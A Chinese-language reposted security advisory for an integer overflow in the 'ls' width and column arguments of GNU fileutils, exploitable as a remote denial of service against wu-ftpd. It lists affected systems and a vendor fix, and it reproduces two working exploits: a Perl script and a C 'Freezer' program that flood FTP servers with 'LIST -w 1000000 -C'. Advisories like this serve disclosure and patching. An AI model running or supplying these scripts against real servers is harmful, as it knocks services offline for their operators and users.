服务器维护网站维护数据维护系统安全配置
专业定制网站企业建站一条龙、软件定制开发、系统集成
稳定虚机备案一条龙，稳定快捷通道
服务理念诚信守诺客户至上专业精神专心贯注

Coreutils ls命令宽度超长参数整数溢出漏洞

作者：黑客防线网安网站维护基地来源：黑客防线网安网站维护基地浏览次数：0

黑客防线网安网讯：发布时间：2003-10-22更新时间：2003-11-03严重程度：中威胁程度：远程拒绝服务错误类型：边界检查错误利用方式：服务器模式BUGTRAQ ID：8875受影响系统
GNU fileutils 4.0 ...

发布时间：2003-10-22
更新时间：2003-11-03
严重程度：中
威胁程度：远程拒绝服务
错误类型：边界检查错误
利用方式：服务器模式

BUGTRAQ ID：8875

受影响系统

GNU fileutils 4.0
   +Debian Linux 2.2 68k
   +Debian Linux 2.2 alpha
   +Debian Linux 2.2 arm
   +Debian Linux 2.2 IA-32
   +Debian Linux 2.2 powerpc
   +Debian Linux 2.2 sparc
   +Immunix Immunix OS 7+
   +RedHat Linux 6.2
   +RedHat Linux 6.2 i386
   +RedHat Linux 7.0
   +RedHat Linux 7.0 i386
   +Slackware Linux 7.0
   +Slackware Linux 7.1
GNU fileutils 4.0.36
   +RedHat Linux 7.1
   +RedHat Linux 7.1 i386
   +RedHat Linux for iSeries 7.1
   +RedHat Linux for pSeries 7.1
GNU fileutils 4.1
   +Caldera OpenLinux Server 3.1
   +Caldera OpenLinux Server 3.1.1
   +Caldera OpenLinux Workstation 3.1
   +Caldera OpenLinux Workstation 3.1.1
   +RedHat Linux 7.2
   +RedHat Linux 7.2 alpha
   +RedHat Linux 7.2 i386
   +RedHat Linux 7.2 ia64
   +RedHat Linux 7.3
   +RedHat Linux 7.3 i386
   +S.u.S.E. Linux 7.0 alpha
   +S.u.S.E. Linux 7.0 i386
   +S.u.S.E. Linux 7.0 ppc
   +S.u.S.E. Linux 7.0 sparc
   +S.u.S.E. Linux 7.1 alpha
   +S.u.S.E. Linux 7.1 ppc
   +S.u.S.E. Linux 7.1 sparc
   +S.u.S.E. Linux 7.1 x86
   +S.u.S.E. Linux 7.2 i386
   +S.u.S.E. Linux 7.3 i386
   +S.u.S.E. Linux 7.3 ppc
   +S.u.S.E. Linux 7.3 sparc
   +Slackware Linux 8.0
   +Sun Cobalt Qube 3
   +Sun Cobalt RaQ 4
   +Sun Cobalt RaQ 550
   +Sun Cobalt RaQ XTR
   +Sun Linux 5.0
   +Sun Linux 5.0.3
   +Sun Linux 5.0.5
   +Sun Linux 5.0.6
   +Sun LX50
   +Trustix Secure Linux 1.1
   +Trustix Secure Linux 1.2
   +Trustix Secure Linux 1.5
GNU fileutils 4.1.6
   +Sun Linux 5.0.6
GNU fileutils 4.1.7
Washington University wu-ftpd 2.4.1
Washington University wu-ftpd 2.4.2 academ[BETA1-15
   +Caldera OpenLinux Standard 1.2
Washington University wu-ftpd 2.4.2 academ[BETA-18]
   +RedHat Linux 5.2 i386
Washington University wu-ftpd 2.4.2 VR17
Washington University wu-ftpd 2.4.2 VR16
Washington University wu-ftpd 2.4.2 (beta 18) VR9
Washington University wu-ftpd 2.4.2 (beta 18) VR8
Washington University wu-ftpd 2.4.2 (beta 18) VR7
Washington University wu-ftpd 2.4.2 (beta 18) VR6
Washington University wu-ftpd 2.4.2 (beta 18) VR5
Washington University wu-ftpd 2.4.2 (beta 18) VR4
Washington University wu-ftpd 2.4.2 (beta 18) VR15
Washington University wu-ftpd 2.4.2 (beta 18) VR14
Washington University wu-ftpd 2.4.2 (beta 18) VR13
Washington University wu-ftpd 2.4.2 (beta 18) VR12
Washington University wu-ftpd 2.4.2 (beta 18) VR11
Washington University wu-ftpd 2.4.2 (beta 18) VR10
Washington University wu-ftpd 2.5 .0
   +Caldera OpenLinux 2.4
   +Caldera OpenLinux Desktop 2.3
   +RedHat Linux 6.0
   +RedHat Linux 6.0 alpha
   +RedHat Linux 6.0 sparc
   +SCO eDesktop 2.4
   +SCO eServer 2.3
   +SCO eServer 2.3.1
Washington University wu-ftpd 2.6 .0
   +Cobalt Qube 1.0
   +Conectiva Linux 4.0
   +Conectiva Linux 4.0 es
   +Conectiva Linux 4.1
   +Conectiva Linux 4.2
   +Conectiva Linux 5.0
   +Conectiva Linux 5.1
   +Debian Linux 2.2
   +Debian Linux 2.2 68k
   +Debian Linux 2.2 alpha
   +Debian Linux 2.2 arm
   +Debian Linux 2.2 powerpc
   +Debian Linux 2.2 sparc
   -FreeBSD FreeBSD 4.3
   -FreeBSD FreeBSD 4.3 -RELEASE
   -FreeBSD FreeBSD 4.3 -STABLE
   -FreeBSD FreeBSD 4.4
   +HP HP-UX 11.0
   +HP HP-UX 11.11
   +RedHat Linux 5.2 alpha
   +RedHat Linux 5.2 i386
   +RedHat Linux 5.2 sparc
   +RedHat Linux 6.0
   +RedHat Linux 6.0 alpha
   +RedHat Linux 6.0 sparc
   +RedHat Linux 6.1 alpha
   +RedHat Linux 6.1 i386
   +RedHat Linux 6.1 sparc
   +RedHat Linux 6.2 alpha
   +RedHat Linux 6.2 i386
   +RedHat Linux 6.2 sparc
   +S.u.S.E. Linux 6.1
   +S.u.S.E. Linux 6.1 alpha
   +S.u.S.E. Linux 6.2
   +S.u.S.E. Linux 6.3
   +S.u.S.E. Linux 6.3 alpha
   +S.u.S.E. Linux 6.3 ppc
   +S.u.S.E. Linux 6.4
   +S.u.S.E. Linux 6.4 alpha
   +S.u.S.E. Linux 6.4 ppc
   +S.u.S.E. Linux 7.0 alpha
   +S.u.S.E. Linux 7.0 i386
   +S.u.S.E. Linux 7.0 ppc
   +S.u.S.E. Linux 7.0 sparc
   +S.u.S.E. Linux 7.1 alpha
   +S.u.S.E. Linux 7.1 ppc
   +S.u.S.E. Linux 7.1 sparc
   +S.u.S.E. Linux 7.1 x86
   +S.u.S.E. Linux 7.2 i386
   +S.u.S.E. Linux 7.3 i386
   +S.u.S.E. Linux 7.3 ppc
   +S.u.S.E. Linux 7.3 sparc
   +TurboLinux Turbo Linux 4.0
   +Wirex Immunix OS 6.2
Washington University wu-ftpd 2.6.1
   +Caldera OpenLinux 2.3
   +Caldera OpenLinux Server 3.1
   +Cobalt Qube 1.0
   +Conectiva Linux 6.0
   +Conectiva Linux 7.0
   +Conectiva Linux 8.0
   -FreeBSD FreeBSD 4.3
   -FreeBSD FreeBSD 4.3 -RELEASE
   -FreeBSD FreeBSD 4.3 -STABLE
   -FreeBSD FreeBSD 4.4
   -FreeBSD FreeBSD 5.0
   -FreeBSD FreeBSD 5.0 alpha
   +MandrakeSoft Corporate Server 1.0.1
   +MandrakeSoft Linux Mandrake 6.0
   +MandrakeSoft Linux Mandrake 6.1
   +MandrakeSoft Linux Mandrake 7.0
   +MandrakeSoft Linux Mandrake 7.1
   +MandrakeSoft Linux Mandrake 7.2
   +MandrakeSoft Linux Mandrake 8.0
   +MandrakeSoft Linux Mandrake 8.0 ppc
   +MandrakeSoft Linux Mandrake 8.1
   +RedHat Linux 7.0 alpha
   +RedHat Linux 7.0 i386
   +RedHat Linux 7.0 sparc
   +RedHat Linux 7.1 alpha
   +RedHat Linux 7.1 i386
   +RedHat Linux 7.1 i586
   +RedHat Linux 7.1 i686
   +RedHat Linux 7.1 ia64
   +RedHat Linux 7.1 noarch
   +RedHat Linux 7.2 alpha
   +RedHat Linux 7.2 athlon
   +RedHat Linux 7.2 i386
   +RedHat Linux 7.2 i586
   +RedHat Linux 7.2 i686
   +RedHat Linux 7.2 ia64
   +RedHat Linux 7.2 noarch
   -S.u.S.E. Linux 7.0
   -S.u.S.E. Linux 7.0 alpha
   -S.u.S.E. Linux 7.0 ppc
   -S.u.S.E. Linux 7.0 sparc
   -S.u.S.E. Linux 7.1
   -S.u.S.E. Linux 7.1 alpha
   -S.u.S.E. Linux 7.1 ppc
   -S.u.S.E. Linux 7.1 sparc
   -S.u.S.E. Linux 7.1 x86
   -S.u.S.E. Linux 7.2
   -S.u.S.E. Linux 7.3
   +SCO eDesktop 2.4
   +SCO eServer 2.3.1
   +SCO Open Server 5.0
   +SCO Open Server 5.0.1
   +SCO Open Server 5.0.2
   +SCO Open Server 5.0.3
   +SCO Open Server 5.0.4
   +SCO Open Server 5.0.5
   +SCO Open Server 5.0.6
   +SCO Open Server 5.0.6 a
   -Slackware Linux 7.0
   -Slackware Linux 7.1
   -Slackware Linux 8.0
   +TurboLinux TL Workstation 6.1
   +TurboLinux Turbo Linux 6.0
   +TurboLinux Turbo Linux 6.0.1
   +TurboLinux Turbo Linux 6.0.2
   +TurboLinux Turbo Linux 6.0.3
   +TurboLinux Turbo Linux 6.0.4
   +TurboLinux Turbo Linux 6.0.5
   +Wirex Immunix OS 7+
   +Wirex Immunix OS 7.0
   +Wirex Immunix OS 7.0 -Beta
Washington University wu-ftpd 2.6.2
   +Compaq Tru64 4.0 b
   +Compaq Tru64 4.0 d
   +Compaq Tru64 4.0 d PK9 (BL17)
   +Compaq Tru64 4.0 e
   +Compaq Tru64 4.0 f
   +Compaq Tru64 4.0 f PK6 (BL17)
   +Compaq Tru64 4.0 f PK7 (BL18)
   +Compaq Tru64 4.0 g
   +Compaq Tru64 4.0 g PK3 (BL17)
   +Compaq Tru64 5.0
   +Compaq Tru64 5.0 PK4 (BL17)
   +Compaq Tru64 5.0 PK4 (BL18)
   +Compaq Tru64 5.0 a
   +Compaq Tru64 5.0 a PK3 (BL17)
   +Compaq Tru64 5.0 f
   +Compaq Tru64 5.1
   +Compaq Tru64 5.1 PK3 (BL17)
   +Compaq Tru64 5.1 PK4 (BL18)
   +Compaq Tru64 5.1 PK5 (BL19)
   +Compaq Tru64 5.1 PK6 (BL20)
   +Compaq Tru64 5.1 a
   +Compaq Tru64 5.1 a PK1 (BL1)
   +Compaq Tru64 5.1 a PK2 (BL2)
   +Compaq Tru64 5.1 a PK3 (BL3)
   +Compaq Tru64 5.1 a PK4 (BL21)
   +Compaq Tru64 5.1 a PK5 (BL23)
   +Compaq Tru64 5.1 b
   +Compaq Tru64 5.1 b PK1 (BL1)
   +Compaq Tru64 5.1 b PK2 (BL22)
   +Conectiva Linux 9.0
   +Debian Linux 3.0
   +Debian Linux 3.0 alpha
   +Debian Linux 3.0 arm
   +Debian Linux 3.0 hppa
   +Debian Linux 3.0 ia-32
   +Debian Linux 3.0 ia-64
   +Debian Linux 3.0 m68k
   +Debian Linux 3.0 mips
   +Debian Linux 3.0 mipsel
   +Debian Linux 3.0 ppc
   +Debian Linux 3.0 s/390
   +Debian Linux 3.0 sparc
   +MandrakeSoft Linux Mandrake 8.2
   +MandrakeSoft Linux Mandrake 8.2 ppc
   +Sun Linux 5.0.7
Washington University wu-ftpd 2.6.2
   +TurboLinux TL Advanced Server 6.0
   +TurboLinux TL Server 6.1
   +TurboLinux TL Workstation 6.0

详细描述
Coreutils 'ls'命令实现上存在整数溢出问题，当程序处理宽度和列数命令行参数时存在漏洞，当处理超长的参数时会导致整数溢出，溢出后的整数值可能使程序发生非预期的行为。其他调用'ls'命令的软件可能因此导致拒绝服务攻击。

测试代码
#!/usr/bin/perl

# DoS sploit for ls
# tested against wu-ftpd 2.6.2

# coded by (c) druid
# greets to viator

use Net::FTP;

(($target = $ARGV[0])&&($count = $ARGV[1])) || die "usage:$0 <target> <count>";
my $user = "anonymous";
my $pass = "halt\@xyu.com";
$cols=1000000;#you can increase this value for more destructive result ;)

print ":: Trying to connect to target system at: $target...\n"; $ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not
connect: $!";
print "Connected!\n";
$ftp->login($user, $pass) || die "could not login: $!";
print "Logged in!\n";
$ftp->cwd("/");
while ($count)
{
$ftp->ls("-w $cols -C");
$count--;
}
print "Done!\n";
$ftp->quit;

/*
*
*                 http://www.rosiello.org
*                  (c) Rosiello Security
*
* Copyright Rosiello Security 2003
* All Rights reserved.
*
* Tested on Red Hat 9.0
*
* Author: Angelo Rosiello
* Mail  : angelo@rosiello.org
* URL   : http://www.rosiello.org
*
* This software is only for educational purpose.
* Do not use it against machines different from yours.
* Respect law.
*
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>

void addr_initialize( );
void usage( );

int main( int argc, char **argv )
{
        int i, sd, PORT, loop, error;
        char user[30], password[30], ch;
        struct sockaddr_in server_addr;

        fprintf( stdout, "\n(c) Rosiello Security 2003\n" );
        fprintf( stdout, "http://www.rosiello.org\n" );
        fprintf( stdout, "WU-FTPD 2.6.2 Freezer by Angelo Rosiello\n\n" );

        if( argc != 6 ) usage( argv[0] );

        if( strlen( argv[3] ) > 20 ) exit( 0 );
        if( strlen( argv[4] ) > 20 ) exit( 0 );

        sprintf( user, "USER %s\n", argv[3] );
        sprintf( password, "PASS %s\n", argv[4] );

        PORT = atoi( argv[2] );
        loop = atoi( argv[5] );

        addr_initialize( &server_addr, PORT, ( long )inet_addr( argv[1] ));
        sd = socket( AF_INET, SOCK_STREAM, 0 );

        error = connect( sd, ( struct sockaddr * ) &server_addr, sizeof( server_addr ));
        if( error != 0 )
        {
                perror( "Something wrong with the connection" );
                exit( 0 );
        }

        while ( ch != '\n' )
        {
                recv( sd, &ch, 1, 0);
                printf("%c", ch );
        }

        ch = '\0';

        printf( "Connection executed, now waiting to log in...\n" );

        printf( "%s", user );

        send( sd, user, strlen( user ), 0 );
        while ( ch != '\n' )
        {
                recv( sd, &ch, 1, 0);
                printf("%c", ch );
        }
        printf( "%s", password );

        ch = '\0';

        send( sd, password, strlen( password ), 0 );
        while ( ch != '\n' )
        {
                recv( sd, &ch, 1, 0);
                printf("%c", ch );
        }

        printf( "Sending the DoS query\n" );
        for( i=0; i<loop; i++ )
        {
                write( sd, "LIST -w 1000000 -C\n", 19 );
        }
        printf( "All done\n" );
        close( sd );
        return 0;
}

void addr_initialize (struct sockaddr_in *address, int port, long IPaddr)
{
        address -> sin_family = AF_INET;
        address -> sin_port = htons((u_short)port);
        address -> sin_addr.s_addr = IPaddr;
}

void usage( char *program )
{
        fprintf(stdout, "USAGE: <%s> <IP> <PORT> <USER> <PASS> <LOOP>\n", program);
        exit(0);
}

解决方案
各厂商已经在最新版本的fileutils软件包中修补了此漏洞。

相关信息
WU-FTPD 2.6.2 Freezer
http://archives.neohapsis.com/archives/bugtraq/2003-10/0331.html

黑客防线网安服务器维护方案本篇连接：http://www.rongsen.com.cn/show.php?contentid-3046.html

网站维护教程更新时间:2010-09-11 00:21:55 【打印此页】【关闭】